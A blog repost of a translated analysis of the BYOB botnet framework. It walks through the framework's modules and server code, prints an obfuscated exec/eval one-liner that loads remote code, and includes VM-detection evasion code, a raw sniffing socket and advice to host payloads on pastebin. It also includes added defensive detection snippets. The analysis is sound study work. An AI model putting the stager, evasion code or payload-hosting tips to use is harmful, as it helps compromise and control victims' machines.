Malwared | BYOB Write-Up Published on FreeBuf

BYOB Write-Up Published on FreeBuf


A pretty decent write-up of my BYOB (Build Your Own Botnet) project was recently published on the Chinese cybersecurity blog FreeBuf.
English translation:
BYOB is an open source botnet framework with 3k stars on GitHub. I recently took the time to read and analyze the code. A botnet refers to an attacker writing a program that automatically exploits vulnerabilities to take control of computers in cyberspace and uses each computer as a node to keep spreading. The author can issue commands through the server to control the nodes and perform operations such as DoS attacks. I have also once taken part in handling a botnet incident during campus network penetration testing.
0x01 Introduction
Emergency Response – Botnet Mining. Some botnets currently seen exploit known n-day vulnerabilities. I think the frightening thing about botnets is not the complexity of the exploits but the automated attacks on intranet applications across network boundaries, while automation determines the difficulty of exploiting the vulnerability. Vulnerabilities exploited by common botnets include: weak passwords, unauthorized access, middleware RCE, general framework RCE, and so on.
Byob is a botnet framework written in Python. To be honest, I think Python is not well suited to writing botnet programs, for several reasons:
1. Python depends heavily on various libraries
2. Python has to handle compatibility across different versions and platforms
3. Implementing some of the features of other languages may be relatively simple, but the result may be poorly hidden
For the first problem, the byob framework uses a remote loading module, but as a non-scripting language, this framework is a very good research subject: both its coding style and some of its details are worth studying. I am going to analyze it and learn from it.
0x02 Structural Features
├── byob
│ ├── script generated by running on the controlled node
│ ├──
│ ├── core core framework code directory
│ │ ├── database operation related
│ │ ├──
│ │ ├── http protocol processing
│ │ ├──
│ │ ├── remote loader
│ │ ├── accept control module
│ │ ├── encryption and decryption processing
│ │ ├──
│ │ ├── universal function
│ ├── data
│ ├── database.db
│ ├──
│ ├── modules use module directory
│ │ ├── privilege escalation, actually runas
│ │ ├── for MAC OS detection login icloud account
│ │ ├──
│ │ ├── keylogger
│ │ ├── collects outlook client data
│ │ ├── sniffing
│ │ ├── payloads
│ │ │ └──
│ │ ├── Some things to hide the back door, there are timing tasks, WMI and other operations
│ │ ├── Send SMS
│ │ ├── port scan, TCP+ping
│ │ ├── Get the process on the system
│ │ ├── Encrypted file, RSA symmetric encryption, no panic
│ │ ├── screenshot
│ │ ├──stagers
│ │ │ └──
│ │ ├──
│ │ └── target webcam control
│ ├── requirements.txt
│ ├── Server
│ └──
Judging by its current functionality, this framework is a relatively good C&C. It has no modules for the automated exploitation and propagation typical of botnets, but as a framework it provides a broad foundation. In addition, the framework includes some features for the Windows environment, such as WMI, and there is still much in it worth learning from.
0x03 Server side
The server side listens on a total of three ports: two web servers and one C&C control port. The web servers are used to load Python modules remotely. Their web roots are the system module directory site-packages and byob's modules directory.

globals()['debug'] = options.debug
globals()['package_handler'] = subprocess.Popen('{} -m SimpleHTTPServer {}'.format(sys.executable, options.port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=globals()['packages'], shell=True)
globals()['module_handler'] = subprocess.Popen('{} -m SimpleHTTPServer {}'.format(sys.executable, options.port + 1), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, cwd=modules, shell=True)
globals()['post_handler'] = subprocess.Popen('{} core/ {}'.format(sys.executable, options.port + 3), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True)
globals()['c2'] = C2(, port=options.port, db=options.database)

The rest is nothing special; it is mainly a matter of seeing how it manages sessions and how control of the nodes is implemented. I will not elaborate.
0x04 Client code generation is a script that generates one-line connect-back code. Generated code:

import zlib, base64, marshal, urllib, json; exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmZgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGhpZ6RpZ65qZ6RgaGVoYGQKCvX1ySmJ5aVKyflJukV1CprqlXlJqYoqEJAAL6FQ4=')))))


As can be seen, it still depends on remote download and execution. The complete functional code is generated in modules/payloads/, and this code is loaded by modules/stagers/ The code in modules/payloads/ is composed of under byob/core. The code used to interact with the Server is primarily located in
A new Python module loader is defined in for loading remote modules.
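A static check for the generated one-liner shown above, added here as an example that is not part of the original write-up or of BYOB: it parses Python source with `ast`, without executing or decoding anything, and reports `exec`/`eval` calls that wrap at least two of `marshal.loads`, `zlib.decompress` and `base64.b64decode`. The function names and the sample blob are constructed for illustration.

```python
import ast
import base64
import zlib

EXECUTORS = {"exec", "eval"}
DECODERS = {"marshal.loads", "zlib.decompress", "base64.b64decode"}

def dotted_name(node):
    """Return 'a.b' for a Name/Attribute call target, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def call_chain(call):
    """Follow f(g(h(...))) through each call's first positional argument."""
    nodes = []
    while isinstance(call, ast.Call):
        nodes.append(call)
        call = call.args[0] if call.args else None
    return nodes

def find_packed_stagers(source):
    """Return name chains where exec/eval wraps two or more decoders (parse only)."""
    hits, reported = [], set()
    for node in ast.walk(ast.parse(source)):  # breadth-first: outer calls come first
        if not isinstance(node, ast.Call) or id(node) in reported:
            continue
        if dotted_name(node.func) not in EXECUTORS:
            continue
        nodes = call_chain(node)
        names = [dotted_name(n.func) or "<dynamic>" for n in nodes]
        if len(DECODERS.intersection(names)) >= 2:
            reported.update(id(n) for n in nodes)  # do not re-report inner eval
            hits.append(names)
    return hits

def constructed_sample():
    """Same shape as the one-liner above; the blob is inert, constructed data."""
    blob = base64.b64encode(zlib.compress(b"constructed, inert bytes")).decode()
    return ("import zlib, base64, marshal; exec(eval(marshal.loads("
            f"zlib.decompress(base64.b64decode('{blob}')))))")

if __name__ == "__main__":
    print(find_packed_stagers(constructed_sample()))
```

Because it keys on the nesting of calls rather than on the blob, the check still matches when the encoded payload changes between generated clients.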
0x05 tips
5.1 Managed payload
Use pastebin to host the payload to increase anonymity. Of course there are other things, such as Dropbox.
5.2 Scalability
Since Byob was designed from the start as a botnet framework, its scalability is very good, so it is convenient to add functional modules to the botnet later. Byob implements this through remote loading; how other, non-scripting languages could implement it is a question. Extending without completely replacing the original running state is also worth learning from.
5.3 Virtual Machine Detection

import os

def environment():
    # environment variable names containing 'VBOX'
    environment = [key for key in os.environ if 'VBOX' in key]
    # process names from tasklist (Windows) or ps (elsewhere) that match known VM guest services
    processes = [line.split()[0 if os.name == 'nt' else -1] for line in os.popen('tasklist' if os.name == 'nt' else 'ps').read().splitlines()[3:] if line.split()[0 if os.name == 'nt' else -1].lower().split('.')[0] in ['xenservice', 'vboxservice', 'vboxtray', 'vmusrvc', 'vmsrvc', 'vmwareuser', 'vmwaretray', 'vmtoolsd', 'vmcompute', 'vmmem']]
    return bool(environment + processes)

This is also relatively simple: it checks environment variables to avoid landing in a honeypot or the like.
5.4 Local Packet Capture

sniffer_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))

This is packet capture implemented in Python.
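A socket opened this way is visible on Linux in /proc/net/packet. The following added example (not from the write-up or from BYOB) parses that table and keeps raw packet sockets bound to ETH_P_ALL, the 0x0003 value used above, then maps each socket inode to the owning PIDs; the sample rows and function names are constructed.

```python
import os

SOCK_RAW = 3         # Linux socket type for SOCK_RAW
ETH_P_ALL = 0x0003   # the protocol the sniffer above passes to socket.htons()

# Constructed sample in the column layout of /proc/net/packet (not from a real host).
SAMPLE = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a0c11110000 3      3    0003   0     1 0      1000   48211
ffff9a0c22220000 3      2    88cc   2     1 0      0      20114
ffff9a0c33330000 3      3    0800   2     1 0      0      20977
"""

def parse_packet_sockets(text):
    """Parse /proc/net/packet rows into dicts; the Proto column is hex."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        f = line.split()
        if len(f) != 9:
            continue
        rows.append({"type": int(f[2]), "proto": int(f[3], 16),
                     "ifindex": int(f[4]), "uid": int(f[7]), "inode": int(f[8])})
    return rows

def capture_all_sockets(rows):
    """Keep raw packet sockets that receive every protocol (ETH_P_ALL)."""
    return [r for r in rows if r["type"] == SOCK_RAW and r["proto"] == ETH_P_ALL]

def pids_for_inode(inode, proc="/proc"):
    """Find PIDs holding the socket by reading /proc/<pid>/fd symlinks."""
    target, pids = f"socket:[{inode}]", []
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:                          # process exited or access denied
            continue
        if target in links:
            pids.append(int(pid))
    return pids

if __name__ == "__main__":
    live = os.path.exists("/proc/net/packet")
    text = open("/proc/net/packet").read() if live else SAMPLE
    for row in capture_all_sockets(parse_packet_sockets(text)):
        print(row, pids_for_inode(row["inode"]) if live else "sample row")
```

tcpdump and similar capture tools produce the same kind of row, so the PID lookup is what separates expected capture processes from unexpected ones.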